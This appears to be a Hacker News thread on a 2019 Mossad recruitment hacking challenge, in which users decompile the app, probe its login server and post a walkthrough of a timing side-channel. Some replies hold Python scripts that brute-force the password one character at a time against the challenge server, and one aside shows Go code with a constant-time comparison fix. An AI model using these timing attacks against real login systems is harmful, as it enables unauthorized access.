
Israeli Mossad launches cyber challenge - stdcall83
http://3d375032374147a7865753e4bbc92682.xyz/
======
atdt
Decompile the APK, and run `strings` on assets/flutter_assets/kernel_blob.bin.

Poke around and you'll find code for POSTing JSON-encoded credentials to
[http://35.246.158.51:8070/auth/getUrl](http://35.246.158.51:8070/auth/getUrl).
(Grep for the IP to find it.)

So, using the web site name as the seed and the 'client id' as the password,
we get:

    $ curl -X POST -H "Content-Type: application/json" \
        -d '{"Seed": "3d375032374147a7865753e4bbc92682", "Password": "d7c6bdcfcb184bf587ceee7c7c28e72e"}' \
        http://35.246.158.51:8070/auth/getUrl

The response is an HTTP 200 and: `{"AuthURL":"/auth/v2"}`

[http://35.246.158.51:8070/auth/v2](http://35.246.158.51:8070/auth/v2) is I
guess the next step.

edit: The /auth/getUrl endpoint responds to any request with the same
response, so that may not be the right Seed/Password combination.

~~~
revocheese
Following your steps for getting the strings, which in turn helped me get the
code of the whole application:

First of all, as per the code, the User-Agent must be set to "iWalk-v2".

Then doing a simple GET request to
[http://35.246.158.51:8070](http://35.246.158.51:8070) will return
`{"AuthURL":"/auth/v2"}`.

Replacing the original URL with
[http://35.246.158.51:8070/auth/v2](http://35.246.158.51:8070/auth/v2) and
then sending JSON like `{"Seed": "3d375032374147a7865753e4bbc92682",
"Password": "d7c6bdcfcb184bf587ceee7c7c28e72e"}` with "Content-Type:
application/json" returns `{"IsValid":false,"LockURL":"","Time":136764}`.

The Time here (as per my understanding of the code) is the request duration,
which somehow contradicts Postman's request duration field.

Now one weird thing I've noticed about this app is this: if I install it on a
regular device, connect that to a proxy, then type gibberish into the
fields and click Login, the following code gets invoked:

    void _submit() async {
      final form = formKey.currentState;
      if (form.validate()) {
        setState(() => _isLoading = true);
        form.save();
        _networkActions.login(_seed, _password)
            .then((result) => _loginCompleted(result))
            .catchError((e) {
              // any network failure is reported as an invalid, empty token
              _loginCompleted(new Token("", false, 0));
            });
      }
    }

If a loading icon appears then I assume that the code passed the condition and
reached this line of code: `setState(() => _isLoading = true);`. Now the weird
part is that I don't see any outgoing connections from the app... (I use
Charles to capture requests.)

~~~
andr0id
It's normal that you don't see any traffic in Charles, since Charles can
only intercept traffic made by HttpUrlConnection or OkHttp, and Flutter uses
neither of those two, so you can't see anything in Charles.

------
chrismeller
Install a random app from Mossad on my phone? N-no, no I don’t think so.

~~~
blattimwind
Challenge is obviously meant to be reversing, not installing.

~~~
mrlatinos
If you deconstruct the APK, you'll find a C script that prints a message -
"You really think it was the Saudis? :)" /s

~~~
rock_artist
So far I've just used those decompile services online and it seems it's
Flutter:

    package com.iwalk.locksmither;

    import android.os.Bundle;
    import io.flutter.app.FlutterActivity;
    import io.flutter.plugins.GeneratedPluginRegistrant;

    public class MainActivity extends FlutterActivity {
        @Override
        protected void onCreate(Bundle savedInstanceState) {
            super.onCreate(savedInstanceState);
            GeneratedPluginRegistrant.registerWith(this);
        }
    }

In terms of permissions, it asks for INTERNET.

~~~
1f60c
Here's the VirusTotal page:
[https://www.virustotal.com/#/file/f422d8ceef1a2c3cd6cce10c83...](https://www.virustotal.com/#/file/f422d8ceef1a2c3cd6cce10c834aa7cc994a95a4d695b16bf114e9e8ebb066d7/detection)

------
tdhoot
In case you didn't want to wait for the slow-typing to load the entire
message:

"Welcome Agent.

A team of field operatives is currently on-site in enemy territory, working to
retrieve intel on an imminent terrorist attack.

The intel is contained in a safe, the plans for which are available to
authorized clients via an app [0].

Our client ID is d09ff4ec651c48f89f7f7aa19160bd55

Your mission is to retrieve those plans, and allow our team to break into the
safe.

Good luck!,

M."

[0]:
[http://3d375032374147a7865753e4bbc92682.xyz/static/app.apk](http://3d375032374147a7865753e4bbc92682.xyz/static/app.apk)

~~~
ChuckNorris89
Are they seriously expecting people to sideload a mossad apk on their phones?

~~~
nickelcitymario
If you're dumb enough to do that... maybe they blacklist you from their
recruitment efforts moving forward.

You could always install it on a virtual phone in a sandboxed VM.

~~~
dclusin
What do you do if they have sandbox escapes you don't know about? The kind of
person that runs it in a VM is someone they'd probably want to be looking at.

Paranoia++ :)

~~~
pmiller2
Download to a burner machine, then airgap it by removing/disabling all
networking hardware, inside a room with no other computers. ;)

~~~
Scoundreller
Then sell the system to an unsuspecting soul on eBay.

~~~
Paraesthetic
Or gumtree

------
jsdev93
THIS IS LEGITIMATE. The Israeli Mossad had an ad today,
[https://www.algemeiner.com/2019/05/09/mossad-marks-israeli-i...](https://www.algemeiner.com/2019/05/09/mossad-marks-israeli-independence-day-with-facebook-riddle/)
with a picture. The picture has 4 rows of trophies, which should be converted
to 4 numbers using binary --> decimal. Those four numbers are 35, 246, 158, 51.

As an ip address, 35.246.158.51 leads to the site OP posted.

------
laurentl
The French cyber security community has a similar challenge every year:
[https://www.sstic.org/2019/challenge/](https://www.sstic.org/2019/challenge/)
(in French).

The challenges usually involve static analysis / disassembly, breaking
improperly configured crypto, etc. The best part (for me at least) is that
competitors must submit a write-up of how they cracked the challenge, and the
best write-ups are published. It makes for fascinating reading even if you’re
not really into that scene.

------
andr0id
Searching for "iWalk-v2" on Google gives the following book as the first result:

[https://books.google.rs/books?id=1nfhpqvLSM4C&pg=PA397&lpg=P...](https://books.google.rs/books?id=1nfhpqvLSM4C&pg=PA397&lpg=PA397&dq=%22iwalk-v2%22&source=bl&ots=oxE7LdoK2w&sig=ACfU3U1h4H0eUFMV2u3zk9VbR_kDiVw_vA&hl=sr&sa=X&ved=2ahUKEwilp4qM94_iAhXIb1AKHXS1CWsQ6AEwBnoECAkQAQ#v=onepage&q=%22iwalk-v2%22&f=false)

On page 397 there is an entry in the index: "iWalk, v2 71". On the same page there
are interesting terms like Islamic terrorism, jihad via internet, Judaism... Also
the page number 71 which stands next to the iWalk term is an interesting coincidence,
since this riddle is celebrating 71 years of Israeli independence...

------
hashberry
This site loads the jQuery library in order to...

1. Access `$("#text1")[0].innerHTML`

2. `$( document ).ready() { typeWriter (); }`

 _facepalm_

~~~
whoisjuan
It's done like that because the typeWriter effect is actually rendering line
break elements (<br>) as it shows up.

~~~
hashberry
_woosh_ , loading jQuery to access an element is not needed.
document.getElementById would suffice.

~~~
whoisjuan
jQuery is still a valid way to manipulate the DOM. There’s nothing wrong with
doing that, especially if you already need to load jQuery for something else.
I don’t think this is what the comment was referring to.

~~~
hashberry
There's no reason to load a 30KB JavaScript library for such a simple webpage.
See [http://youmightnotneedjquery.com/](http://youmightnotneedjquery.com/)

------
lone_haxx0r
I don't have time for slow-ass typing text. Next.

~~~
mfatica
view page source mr hackerman

~~~
lone_haxx0r
If I need to read the source code of a fucking website for it to be useful,
then it's either a really special edge-case or the designer is a moron. Guess
which case this is.

Why not upload a plain text file in the first place?

~~~
mfatica
because it's a hacking challenge website not a fucking blog. it's supposed to
be thematic

------
salawat
Oh, come on. You have to have an old phone lying around to factory reset for
shits and giggles. Not like they'd burn good zero days on a publicity stunt.

Remember, this thing'll be getting picked apart by everybody considering the
source.

Unless you're afraid of getting black bagged that i...<SIGNAL LOST>

~~~
benburleson
You don't need a 0-day when the target installs for you.

------
qwerty40
Challenge 3: Do we need to RE the EXE cause that’s look obvious but I don’t
think that that’s what we need to do

------
Ritsuko_akagi
I hope my house does receive air strike

~~~
chrischen
I think you mean “doesn’t”. OP is referring to the recent Israeli airstrike of
suspected Hamas hacking group building.

------
jakobov
How do we know this is created by the mossad?

------
Harible
Still stuck at Level 2... Any ideas?

------
alphagrep12345
How do you know it's by mossad?

~~~
Polycryptus
Once you solve the first challenge it tells you to send an email to an @gov.il
email address, which confirms it pretty well for me.

------
Naac
Ignoring the editorialized made up title of this post, is there any
information on who actually made this challenge?

~~~
stdcall83
Saved you the fuss of reading Hebrew, but actually the challenge starts at:
[https://www.mossad.gov.il/Pages/default.aspx](https://www.mossad.gov.il/Pages/default.aspx)

You need to figure out the address of the site I posted from the picture. (Not
that difficult)

~~~
mrlatinos
Cookies must be enabled... APK to install...

Does curiosity really make y'all this dumb?

~~~
TheLoneTechNerd
Level 1: The people who just go to the site/download the APK

Level 2: The people who realize that the requested actions are likely unsafe,
and complain about it

Level 3: People who realize that this is part of the challenge and just use a
VM

Nobody on HN is "this dumb", if you want to participate in a challenge with an
_intelligence agency_ , take the proper precautions

~~~
mrlatinos
The majority of the population is Level 1. Consider what that means for
Mossad.

Enjoy your challenge.

~~~
nocturnial
I thought the majority of the population was level 4.

Level 4: Ignore it.

~~~
m3gatr0n
Level 5: You've downloaded Droid4X extra because of it, installed Java and
everything and then you come back on HN to look if somebody is already on the
next challenge (in order to save time) and then you start again, but with the
new challenge :)

------
DvirRonaldo
First Challenge Solution: Mossad 2019 Challenge Start:
[https://r-u-ready-4.it/](https://r-u-ready-4.it/). Every line in the image is a binary 8-bit
number; together they give you an IP address: 35.246.158.51

Challenge-1: Link
[http://3d375032374147a7865753e4bbc92682.xyz](http://3d375032374147a7865753e4bbc92682.xyz)
/ [http://35.246.158.51](http://35.246.158.51)

Download app.apk from
[http://3d375032374147a7865753e4bbc92682.xyz/static/app.apk](http://3d375032374147a7865753e4bbc92682.xyz/static/app.apk).
Remember your Client ID - mine is 854279b4c89e4b5c9722352c3f9f1d6c. You will
use it as the "Seeder" property in the app.

Using Wireshark (or any other packet sniffer) we can see that the login button
does this:

    POST /auth/v2 HTTP/1.1
    user-agent: iWalk-v2
    content-type: application/json; charset=utf-8
    accept-encoding: gzip
    content-length: 29
    host: 35.246.158.51:8070

    {"Seed":"admin","Password":"admin "}

    HTTP/1.1 200 OK
    Content-Type: application/json
    Date: Wed, 08 May 2019 21:49:05 GMT
    Content-Length: 47

    {"IsValid":false,"LockURL":"","Time":149646302}

Using [http://www.javadecompilers.com/](http://www.javadecompilers.com/), I
decompiled the APK and got a look at the Manifest:

    <?xml version="1.0" encoding="utf-8" .......
    <activity
        android:configChanges="density|fontScale|keyboard|keyboardHidden|layoutDirection|locale|orientation|screenLayout|screenSize"
        android:hardwareAccelerated="true" android:launchMode="singleTop"
        android:name="com.iwalk.locksmither.MainActivity" .... .....

The line "look for us on github.com" got my attention, so I looked for
iwalk.locksmither on GitHub and found "iwalk-locksmithers", link:
[https://github.com/iwalk-locksmithers-app](https://github.com/iwalk-locksmithers-app).
The server source code was there. In the code, there are a few comments that
can help:

[https://github.com/iwalk-locksmithers-app/server/blob/master...](https://github.com/iwalk-locksmithers-app/server/blob/master/main.go)
line 70 points us to the auth-1 weakness.

This part:

    for currentIndex < len(lock.Password) && currentIndex < len(loginData.Password) {
        if lock.Password[currentIndex] != loginData.Password[currentIndex] {
            break
        }
        //OG: securing against bruteforce attempts... ;-)
        time.Sleep(30 * time.Millisecond)
        currentIndex++
    }

The "securing against bruteforce" (trying all combinations) is the weakness. The
idea behind hacking the password is to try only one char at first. If we
get a 30ms delay, it means we got the 1st char right, so then we can check the
next one, so we try 2 chars (the 1st we know, the second we guess);
if we get a 60ms +- delay then we got the 2nd char and we try the
third one, and again and again, until we get the password.

To solve it, I wrote a simple C# program that does HTTP posts to the
server in a loop, every time trying to add a new char to the password, and if we get a
delay that is +- 30ms more than the last try, we add that char to our final
password. The URI is
[http://35.246.158.51:8070/auth/v1_1](http://35.246.158.51:8070/auth/v1_1) and
the user agent is ed9ae2c0-9b15-4556-a393-23d500675d4b (as written in the server). I
did some average calculations of the delays. The password length is 32 with hex chars
(didn't know that until I guessed the password). We can know that the password
is correct when we get back `"IsValid":true`. *The Time we get is in nanoseconds
and not ms.

After I entered the password and client ID, I got a link for a token and a link
for challenge 2:

[http://759d8eba52184f538c8a4525680cfb33.xyz/](http://759d8eba52184f538c8a4525680cfb33.xyz/)

Challenge-2
[http://759d8eba52184f538c8a4525680cfb33.xyz/](http://759d8eba52184f538c8a4525680cfb33.xyz/)
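
The server loop quoted above leaks how many leading characters of the submitted password are correct, because the work it does (one sleep per matching byte) grows with the matching prefix. As an added example, not the challenge's or the thread's own code, here is a Go comparison of that shape beside the constant-time fix from the standard library's crypto/subtle; the per-character delay is a parameter so the leak can be counted instead of timed, and the sample password and the full-length equality rule are assumptions.

```go
package main

import (
	"crypto/subtle"
	"fmt"
	"time"
)

// leakyCompare has the shape of the loop quoted from the server's main.go:
// it stops at the first differing byte and sleeps once per matching byte.
// It also returns the number of sleeps, the work an observer can measure
// through response time. Full-length equality as the validity rule is an
// assumption made for this example.
func leakyCompare(stored, submitted string, perChar time.Duration) (bool, int) {
	i := 0
	for i < len(stored) && i < len(submitted) {
		if stored[i] != submitted[i] {
			break
		}
		time.Sleep(perChar) // work grows with the matching prefix
		i++
	}
	return i == len(stored) && len(stored) == len(submitted), i
}

// constantTimeCompare is the fix: subtle.ConstantTimeCompare touches every
// byte whatever the first mismatch, so time does not depend on how much of
// the guess is right. It still returns early on a length mismatch; with a
// fixed-length 32-hex password that reveals nothing, otherwise compare
// fixed-length digests of the two values instead.
func constantTimeCompare(stored, submitted string) bool {
	return subtle.ConstantTimeCompare([]byte(stored), []byte(submitted)) == 1
}

func main() {
	// Constructed sample value, not the challenge's real password.
	const stored = "0123456789abcdef0123456789abcdef"
	for _, guess := range []string{"x", "0123x", "0123456789abcdef0123456789abcde", stored} {
		valid, sleeps := leakyCompare(stored, guess, 0)
		fmt.Printf("%-34q leaky: %2d sleeps valid=%-5v constant-time: valid=%v\n",
			guess, sleeps, valid, constantTimeCompare(stored, guess))
	}
}
```

With a real 30ms delay the sleep count is exactly the response-time step the post above describes; the constant-time version has no such step to observe.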

~~~
rootux
Not sure I understand the bruteforce code. I'm trying to get the first char.
I've written something along the lines of:

    import requests
    import string

    # a-zA-Z!@#$%^&*()_-=
    printables_chars = string.printable
    agent = 'ed9ae2c0-9b15-4556-a393-23d500675d4b'
    # the server expects the user agent and a JSON body
    headers = {'User-Agent': agent, 'Content-Type': 'application/json'}

    for i, char in enumerate(printables_chars):
        print('run {}. char {}'.format(i, char))
        result = requests.post('http://35.246.158.51:8070/auth/v1_1',
                               json={"Seed": "d14236b60e0f4aef94499cb648a5f522", "Password": char},
                               headers=headers)
        if result.json()['Time'] > 100000000:
            # This prints randomly for some cases and others doesn't
            print(result.json()['Time'])

~~~
adv-it
On Python I used this:

    import requests

    CHARACTERS = "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789!@#$%^&*()_+-=[]{}|\\/?,.<>`~"
    URL = "http://35.246.158.51:8070/auth/v1_1"
    HEADERS = {'User-Agent': 'ed9ae2c0-9b15-4556-a393-23d500675d4b',
               'content-type': 'application/json; charset=utf-8'}
    PAYLOAD = {}

    for i in range(len(CHARACTERS)):
        PAYLOAD['Seed'] = "6711d2ec0d724396ad1570fcfb431443"
        PAYLOAD['Password'] = "" + CHARACTERS[i]
        r = requests.post(url=URL, json=PAYLOAD, headers=HEADERS)
        result = r.json()
        delay = result['Time']  # server-reported duration, in nanoseconds
        print(str(PAYLOAD) + " - " + str(delay))

But for the first character I don't see a really huge DELAY in the response; I always
have a few characters with a big delay and not only one.

~~~
Gra8888
I think you can remove the capital letters and special characters; you need only abc...1234 (letters and numbers), it's
faster. Incredible code.

------
zuburking
Is the challenge 2 download cert page down?

------
yanirta
Challenge #2, someone forgot a reference to
[https://dev.missilesys.com/](https://dev.missilesys.com/) ;)

